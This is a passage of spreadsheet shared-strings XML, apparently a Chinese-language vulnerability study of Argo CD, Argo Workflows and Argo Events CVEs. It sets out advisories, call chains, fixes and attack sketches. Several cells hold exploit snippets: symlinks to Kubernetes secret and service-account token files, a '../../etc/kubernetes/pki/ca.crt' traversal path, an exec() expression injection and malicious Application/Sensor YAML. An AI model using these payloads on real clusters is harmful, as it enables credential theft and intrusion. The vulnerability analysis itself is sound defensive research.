        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">5. 文件系统隔离不足
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">跨应用源码存储：
若多个应用的源码仓库被克隆到 repo-server 的同一根目录（如 /tmp 或 /app/repos），符号链接可横向访问其他应用的源码文件。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">挂载敏感卷：
repo-server Pod 挂载了包含敏感数据的卷（如 Secret 卷），且文件路径可被符号链接指向。
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">漏洞利用流程
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">提交恶意 Helm Chart：
攻击者向仓库提交包含符号链接的 Helm Chart，例如：
bash
ln -s /etc/kubernetes/secrets/argo-cd-admin.conf charts/malicious-link.yaml
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">触发 Argo CD 同步：
当 repo-server 处理该 Helm 应用时，解析符号链接并读取目标文件。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">泄露敏感数据：
若目标文件是有效 YAML，其内容会被包含在 Helm 生成的清单中，并通过 Argo CD UI 或 API 暴露给攻击者。
攻击流程：
-----
提交恶意 Chart：
将包含符号链接的 Helm Chart 推送到 Git 仓库的 malicious-chart 目录。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">创建 Argo CD Application：
应用上述 Application 资源，Argo CD 的 repo-server 会拉取仓库并解析该 Chart。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">触发路径遍历：
GetAppDetails() 方法调用 populateHelmAppDetails() 时，加载 values.yaml 符号链接，读取其指向的敏感文件（如 /etc/passwd）。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">数据泄露：
敏感文件内容会出现在以下位置：
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Argo CD UI：在应用的详情页面中显示 values.yaml 解析后的参数。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>API 响应：通过 RepoServerAppDetailsQuery 请求返回的 res.Helm.Values 字段。
-----</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">经典控制器
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
CLI 命令的实现（argocd app diff、sync、manifests 等命令属于 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>客户端工具链，其实现通常位于 Argo CD 的 cmd 包或独立的 CLI 模块中，而非控制器核心逻辑中。这些命令通过调用 Argo CD API 或直接操作 Kubernetes API 实现功能。）</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">调用深度：9
CLI 工具: NewApplicationCreateCommand [CLI工具】-&gt; Create(server\application\application.go)/
 控制器： func (ctrl *ApplicationController) autoSync(app *appv1.Application, syncStatus *appv1.SyncStatus, resources []appv1.ResourceStatus) *appv1.ApplicationCondition 【控制器】 -&gt; SetAppOperation-&gt; func (s *Server) Update
后面的一致：
-&gt;validateAndUpdateApp-&gt;validateAndNormalizeApp-&gt;
func ValidateRepo-&gt;appDetails, err := repoClient.GetAppDetails (grpc client 调用）
-&gt; func (s *Service) GetAppDetails(ctx context.Context, q *apiclient.RepoServerAppDetailsQuery) (*apiclient.RepoAppDetailsResponse, error) { -&gt;if err := populateHelmAppDetails(res, ctx.appPath, q); err != nil {
-&gt;
if err := loadFileIntoIfExists(filepath.Join(appPath, "values.yaml"), &amp;res.Helm.Values); err != nil {
        return err
    }
-----
repo-server grpc 调用
MethodName: "GetAppDetails",
   Handler:    _RepositoryService_GetAppDetails_Handler,
GetAppDetails-&gt;populateHelmAppDetails-&gt; loadFileIntoIfExists
</t>
  </si>
  <si>
    <t>去除sink点，使用更安全的api
使用 pathutil.ResolvedFilePath 类型替代普通字符串
所有文件路径都经过 ResolveFilePath 验证
增加了错误处理和警告日志
使用类型安全的路径处理</t>
  </si>
  <si>
    <t>CVE-2022-31016</t>
  </si>
  <si>
    <t xml:space="preserve">
Argo CD 是一款面向 Kubernetes 的声明式持续部署工具。Argo CD v0.7.0 及后续版本存在内存消耗不受控漏洞，已获得授权的恶意用户可利用该漏洞使 repo-server 服务崩溃，从而导致拒绝服务攻击。攻击者需具备 Argo CD 身份认证权限，并被授权从包含（或可被植入）大型文件的代码仓库部署 Applications。该漏洞已在 2.3.5、2.2.10、2.1.16 及更高版本中修复，目前暂无已知的临时解决方案，建议用户升级至修复版本。</t>
  </si>
  <si>
    <t>**攻击面或影响范围**：  
   - 使用Argo CD且未升级的Kubernetes集群。  
   - 攻击者需具备Argo CD应用部署权限，并能控制仓库内容（如注入大文件）。</t>
  </si>
  <si>
    <t>**攻击者利用方式**：  
   - 创建/修改Git仓库，添加超大文件（如GB级）。  
   - 通过Argo CD的`Application`资源指向该仓库，触发`repo-server`同步时内存耗尽崩溃。</t>
  </si>
  <si>
    <t xml:space="preserve">an application source type v1alpha1.ApplicationSourceTypeDirectory (非注入，只有当app 设置为v1alpha1.ApplicationSourceTypeDirector source type时漏洞才可被触发）
apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
  name: exploit-app
  namespace: argocd
spec:
  project: default
  source:
    repoURL: https://github.com/attacker/malicious-repo.git
    targetRevision: main
    path: exploit-dir
    directory:
      recurse: true     # 启用递归遍历
      include: "*.yaml" #  放置一个巨大的文件
  destination:
    server: https://kubernetes.default.svc
    namespace: default
</t>
  </si>
  <si>
    <t xml:space="preserve">Argo CD is a declarative continuous deployment for Kubernetes. Argo CD versions v0.7.0 and later are vulnerable to an uncontrolled memory consumption bug, allowing an authorized malicious user to crash the repo-server service, resulting in a Denial of Service. The attacker must be an authenticated Argo CD user authorized to deploy Applications from a repository which contains (or can be made to contain) a large file. The fix for this vulnerability is available in versions 2.3.5, 2.2.10, 2.1.16, and later. There are no known workarounds. Users are recommended to upgrade.
</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">攻击步骤：
1. 在被授权的仓库中创建恶意符号链接
2. 符号链接指向仓库边界外的敏感文件
3. 利用 Argo CD 的符号链接解析机制
4. 获取目标文件内容
ada logic 2022安全审计报告有详细信息：ADA-ARGO-SA-16: Path traversal leading to reading of out of
bounds manifest files
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>攻击过程</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
1.创建/注入超大文件：在Git仓库中添加GB级的文件（如数据库快照、日志或二进制文件），利用git push上传到服务器侧仓库[1][3]。
2.触发同步进程：将Argo CD的Application资源指向该仓库，触发repo-server执行仓库克隆/解析，此过程会加载所有Git对象数据到内存[4]。
3.内存资源耗尽：超大文件的解析消耗巨大内存，导致repo-server进程崩溃，出现服务拒绝（Denial of Service, DoS）</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">资源引用较大的文件导致资源消耗从而导致崩溃
</t>
  </si>
  <si>
    <t>传播深度：8（ 最长）
processAppRefreshQueueItem(synchandler) -&gt;CompareAppState-&gt; targetObjs, manifestInfo, err = m.getRepoObjs(app, source, appLabelKey, revision, noCache, noRevisionCache, verifySignature, project)-&gt;
manifestInfo, err := repoClient.GenerateManifest
）
 → Repo Server (gRPC 请求)
 MethodName: "GenerateManifest",
            Handler:    _RepoServerService_GenerateManifest_Handler,
 func (s *Service) GenerateManifest-&gt;func (s *Service) runManifestGen-&gt;-&gt;GenerateManifests （reposerver\repository\repository.go）-&gt; targetObjs, err = findManifests(logCtx, appPath, repoRoot, env, *directory) -&gt;out, err := utfutil.ReadFile(path, utfutil.UTF8)</t>
  </si>
  <si>
    <t>CVE-2022-24904</t>
  </si>
  <si>
    <t xml:space="preserve">
Argo CD是一款基于声明式GitOps的Kubernetes持续交付工具。自0.7.0版本起至2.1.15、2.2.9和2.3.4之前的版本存在符号链接越界漏洞，允许具备仓库写入权限的恶意用户从Argo CD的repo-server泄露敏感文件。攻击者可通过在目录型应用（或可能被用作目录型应用）的仓库中提交指向越界文件的符号链接，窃取包括其他应用源仓库的清单文件（若使用解密插件可能包含解密后的文件）以及以文件形式挂载在repo-server上的JSON格式密钥等敏感数据。该漏洞已在Argo CD 2.3.4、2.2.9和2.1.15版本中修复。对于2.3.0及以上版本且未部署任何Jsonnet/目录型应用的用户，可通过禁用Jsonnet/目录配置管理工具作为临时缓解措施。</t>
  </si>
  <si>
    <t>**攻击面**：  
   - 使用目录/Jsonnet类型Application的集群  
   - repo-server挂载的Secrets/ConfigMaps  
   - 共享存储卷的解密文件</t>
  </si>
  <si>
    <t>**利用方式**：  
   - 攻击者提交包含`../../var/run/secrets/kubernetes.io`的符号链接  
   - repo-server渲染Application时读取符号链接指向的Secret文件  
   - 通过Argo CD API或日志泄露敏感数据</t>
  </si>
  <si>
    <t>an application source type v1alpha1.ApplicationSourceTypeDirectory (非注入，只有当app 设置为v1alpha1.ApplicationSourceTypeDirector source type时漏洞才可被触发）
apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
  name: exploit-app
  namespace: argocd
spec:
  project: default
  source:
    repoURL: https://github.com/attacker/malicious-repo.git
    targetRevision: main
    path: exploit-dir
    directory:
      recurse: true     # 启用递归遍历
      include: "*.yaml" # 匹配符号链接文件
  destination:
    server: https://kubernetes.default.svc
    namespace: default
攻击步骤：
在仓库的 exploit-dir 目录中创建符号链接文件（如 link-to-secret.yaml -&gt; /var/run/secrets/kubernetes.io/serviceaccount/token）。
Argo CD 同步应用时，解析符号链接并读取目标文件内容，通过清单响应泄露敏感信息。</t>
  </si>
  <si>
    <t>apiVersion: argoproj.io/v1alpha1
     kind: Application
     spec:
       source:
         path: malicious_dir/  # 含符号链接的恶意目录
         repoURL: https://malicious-repo
         targetRevision: HEAD
       project: default</t>
  </si>
  <si>
    <t>Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Argo CD starting with version 0.7.0 and prior to versions 2.1.15m 2.2.9, and 2.3.4 is vulnerable to a symlink following bug allowing a malicious user with repository write access to leak sensitive files from Argo CD's repo-server. A malicious Argo CD user with write access for a repository which is (or may be) used in a directory-type Application may commit a symlink which points to an out-of-bounds file. Sensitive files which could be leaked include manifest files from other Applications' source repositories (potentially decrypted files, if you are using a decryption plugin) or any JSON-formatted secrets which have been mounted as files on the repo-server. A patch for this vulnerability has been released in Argo CD versions 2.3.4, 2.2.9, and 2.1.15. Users of versions 2.3.0 or above who do not have any Jsonnet/directory-type Applications may disable the Jsonnet/directory config management tool as a workaround.</t>
  </si>
  <si>
    <t>攻击步骤：
1. 在被授权的仓库中创建恶意符号链接
2. 符号链接指向仓库边界外的敏感文件
3. 利用 Argo CD 的符号链接解析机制
4. 获取目标文件内容
ada logic 2022安全审计报告有详细信息：ADA-ARGO-SA-16: Path traversal leading to reading of out of
bounds manifest files</t>
  </si>
  <si>
    <t xml:space="preserve">
在Argo Workflows 3.1.3及之前版本中，若启用了EXPRESSION_TEMPLATES功能，且允许不受信用户在运行工作流时指定输入参数，攻击者将能够干扰破坏该工作流，因为表达式模板的输出会被执行评估。</t>
  </si>
  <si>
    <t>**攻击面**:  
   - 启用了`EXPRESSION_TEMPLATES`的Argo Workflows实例  
   - 允许未授权/低权限用户提交或修改Workflow资源</t>
  </si>
  <si>
    <t>**利用方式**:  
   - 攻击者创建包含恶意表达式模板的Workflow资源  
   - Argo服务端解析表达式时触发非预期操作（如命令执行、资源删除）</t>
  </si>
  <si>
    <t>apiVersion: argoproj.io/v1alpha1
   kind: Workflow
   spec:
     entrypoint: main
     arguments:
       parameters:
       - name: malicious-input
         value: "{{=exec(\"恶意命令\")}}"  # 攻击者通过表达式执行任意代码
     templates:
     - name: main
       container:
         image: alpine
         command: [sh, -c]
         args: ["echo {{workflow.parameters.malicious-input}}"]</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">允许攻击者通过输入参数注入恶意构造的 JSON 片段，篡改工作流模板的 </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>运行时定义，从而绕过预期逻辑并执行任意操作。其核心问题在于：
1. Golang JSON 序列化允许重复键，后出现的键会覆盖前值。
2. 模板键的字母顺序排序，使攻击者可通过参数注入覆盖关键字段（如 args），。
动态解析参数-&gt; 动态提供参数对原资源配置文件中的字段进行注入
数据流传播路径较为复杂！</t>
    </r>
  </si>
  <si>
    <t>In Argo Workflows through 3.1.3, if EXPRESSION_TEMPLATES is enabled and untrusted users are allowed to specify input parameters when running workflows, an attacker may be able to disrupt a workflow because expression template output is evaluated.</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1. 提交包含恶意参数的工作流
2. concat 步骤输出恶意 JSON 片段
3. print 步骤解析 JSON 时，后面的字段覆盖前面的字段
4. 导致命令执行被篡改
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">命令执行：覆盖 args 或 command 字段，执行任意容器命令。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">环境变量篡改：修改 env 字段，泄露敏感信息或影响业务流程。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>权限提升：结合 Kubernetes 服务账户权限，可能实现集群内横向移动。</t>
    </r>
  </si>
  <si>
    <t>复杂的上下文</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">跨信任域数据传递
信任域：
用户输入层：终端用户提交的工作流定义（YAML）或参数。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">工作流引擎层：Argo Workflows 控制器解析和执行工作流的逻辑。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Kubernetes 集群层：工作流实际操作的 Pod、Service 等资源。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>多租户隔离层</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>（若存在）：不同用户/团队之间的资源隔离。</t>
    </r>
  </si>
  <si>
    <t>增加check
使用 json.Marshal 确保所有特殊字符都被正确转义，避免了 JSON 解析器将输入解释为结构化数据</t>
  </si>
  <si>
    <t xml:space="preserve">
软件包 github.com/argoproj/argo-events/sensors/artifacts 在 1.7.1 之前的版本存在目录遍历漏洞，该漏洞位于 git.go 文件中的 (g *GitArtifactReader).Read() API。若向 GitArtifactReader 提供包含符号链接或诸如 ... 等隐式目录名的路径名，则可能导致任意文件读取。</t>
  </si>
  <si>
    <t>**攻击面**: 
   - 使用Argo Events进行Git仓库监控的工作流
   - 未经验证的Git仓库来源
   - 启用了`insecure`标志的Git artifact配置</t>
  </si>
  <si>
    <t>**利用方式**:
   - 攻击者构造包含符号链接的Git仓库
   - 通过修改filePath字段进行路径逃逸
   - 读取节点文件系统敏感文件（如Kubernetes证书、Secret挂载点）</t>
  </si>
  <si>
    <t xml:space="preserve">a Git Trigger Source.filepath
Git Trigger Source: Git Trigger Source 是 Argo Events 中的一个自定义资源（Custom Resource），它定义在 Argo Events 的传感器（Sensor）资源中。
这个资源：
是 Sensor CRD 的一部分
用于定义触发器的来源
指定如何从 Git 仓库获取工作流定义
包含了 Git 仓库的配置信息
Sensor.[]triggers.Template.ArgoWorkflow .FilePath
示例：
apiVersion: argoproj.io/v1alpha1
kind: Sensor
metadata:
  name: webhook
spec:
  triggers:
    - template
        name: webhook-workflow-trigger.Source.Git.
        k8s:
          operation: create
          source:
            git:                                         # Git Trigger Source
              url: "git@github.com:example/repo.git"     # Git 仓库 URL
              cloneDirectory: "/git/example"             # 克隆目录
              filePath: "workflow.yaml"                  # 工作流文件路径
              branch: "main"                            # 分支
              sshKeyPath: "/secret/ssh-key"             # SSH 密钥路径
</t>
  </si>
  <si>
    <t>apiVersion: argoproj.io/v1alpha1
kind: Sensor
metadata:
  name: vulnerable-sensor
spec:
  dependencies:
    - name: git-dep
      artifact:
        git:
          url: https://github.com/attacker/repo
          # 恶意路径构造
          filePath: "../../etc/kubernetes/pki/ca.crt" 
          insecure: true</t>
  </si>
  <si>
    <t>ada logic 2022安全审计报告有详细信息：ADA-ARGO-SA-13: Insecure path traversal in Git Trigger
Source can lead to arbitrary file read
注： 项目中大部分的字段都存在直接使用的情况，可以再扫一下看看</t>
  </si>
  <si>
    <t>3种攻击方式：
1）符号链接攻击
攻击步骤：
1. 攻击者控制 Git 仓库
2. 在仓库中添加指向敏感文件的符号链接
3. 当 Argo 克隆仓库时，跟随符号链接
4. 读取敏感文件内容
2） 竞态条件攻击
攻击步骤：
1. 攻击者需要对文件系统有限访问权限
2. 监控 git-temp 目录的创建
3. 在目录创建和文件读取之间
4. 将目录替换为指向目标目录的符号链接
3)  恶意清单攻击（ git trigger source)
GitArtifactReader.artifact.FilePath
# 攻击者创建恶意的 Git Trigger Source
triggers:
- template:
    name: workflow-trigger
    k8s:
      source:
        git:
          url: "git@github.com:argoproj/argo-workflows.git"
          filePath: "/path/to/sensitive/file"  # 指向任意敏感文件
ada logic 2022安全审计报告有详细信息：ADA-ARGO-SA-13: Insecure path traversal in Git Trigger
Source can lead to arbitrary file read</t>
  </si>
  <si>
    <t>复杂的来源-外部引用输入</t>
  </si>
  <si>
    <t>直接注入
外部输入源： 文件引用
（ 攻击者需要提前将读取的文件替换成符号连接）</t>
  </si>
  <si>
    <t>目录遍历
(g *GitArtifactReader).Read() API. Read()-&gt;
o (g *GitArtifactReader).readFromRepository()-&gt;
return ioutil.ReadFile(fmt.Sprintf("%s/%s", dir, g.artifact.FilePath))</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
非典型控制器协调循环模式：
EDA ( 事件驱动响应为核心）
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Sensor上下文初始化：
go
sensorExecutionCtx := sensors.NewSensorContext(kubeClient, dynamicClient, ...)
组合了Kubernetes客户端、动态客户端和总线配置。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">事件处理循环：
sensorExecutionCtx.Start(ctx)启动协调循环，核心操作包括：
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">监听EventBus：通过ebSubject订阅事件（网络I/O）
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">条件判断：校验事件是否符合触发规则（CPU/内存计算）
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">触发动作：通过dynamicClient创建Argo Workflow等资源（API写入）
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">状态回写：更新Sensor资源的status字段（etcd写入）
环境变量读取：从环境变量获取配置信息，可能来自ConfigMap或Secret。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Kubernetes API交互：通过kubeClient和dynamicClient进行资源的增删改查。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">事件总线通信：通过busConfig连接事件总线，进行消息的发布和订阅。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t>日志和监控数据写入：记录日志和收集指标，涉及日志系统和监控存储。</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">调用深度: 10
func (sensorCtx *SensorContext) Start(ctx context.Context) error -&gt; func (sensorCtx *SensorContext) listenEvents-&gt; func (sensorCtx *SensorContext) triggerActions-&gt;func (sensorCtx *SensorContext) triggerWithRateLimi-&gt;func (sensorCtx *SensorContext) triggerOne-&gt;func (t *ArgoWorkflowTrigger) FetchResource-&gt;func FetchKubernetesResource (存在获取k8s 资源的操作）-&gt;func FetchArtifact(reader ArtifactReader)-&gt;(g *GitArtifactReader).Read() API. Read()-&gt; (g *GitArtifactReader).readFromRepository()-&gt;
</t>
  </si>
  <si>
    <t>增加check
来源验证：在构造时验证路径
路径限制：禁止特定字符
符号链接检查：禁止使用符号链接
路径清理：使用 path.Clean 规范化路径</t>
  </si>
  <si>
    <t>CVE-2022-24348</t>
  </si>
  <si>
    <t xml:space="preserve">
Argo CD 2.1.9之前版本及2.2.4之前的2.2.x版本由于repository.go文件中helmTemplate函数存在缺陷，允许存在与Helm图表相关的目录遍历漏洞。例如，攻击者可能通过此漏洞获取存储在YAML文件中的凭证信息。</t>
  </si>
  <si>
    <t>攻击面：  
- 具有Argo CD写权限的用户（PR:L）  
- 使用外部Helm仓库的部署流程  
- 挂载了敏感目录的Argo CD实例</t>
  </si>
  <si>
    <t>利用方式：  
- 创建恶意Application资源，指定包含路径遍历的Helm values  
- 通过API伪造helmTemplate请求，使Argo渲染时读取`/var/run/secrets/kubernetes.io/serviceaccount/token`等敏感文件  
- 窃取存储在YAML中的k8s Secret凭证</t>
  </si>
  <si>
    <t>apiVersion: argoproj.io/v1alpha1
kind: Application
spec:
  helm:
    valueFiles:
      - /path/to/other/app/values.yaml  # 注入点
---
完整的攻击示例：
apiVersion: argoproj.io/v1alpha1
kind: Application
metadata:
 name: testApplication
 namespace: argocd
spec:
 destination:
   namespace: default
   server: https://kubernetes.default.svc
 project: default
 source:
  helm:
   valueFiles:
      - /path/to/other/app/values.yaml  # 注入点
  path: src
  repoURL:  https://github.com/[path_to_repo].git</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1. </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">Argo CD版本未修复
必须使用未修复路径遍历检查机制的版本（影响范围：v1.3.0至v2.3.0-rc3）。
修复版本（如v2.3.0-rc4+）通过强制所有valueFiles路径通过EnforceToCurrentRoot()校验，无论其是否为URI。
2. </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">攻击者具备仓库写入权限
需能向Argo CD关联的Git仓库提交恶意Helm Chart，或直接修改已同步仓库的valueFiles字段。
写入权限可通过协作开发流程（如合并恶意PR）、被入侵的账户或过度宽松的RBAC策略获取。
3. </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="等线"/>
        <charset val="134"/>
      </rPr>
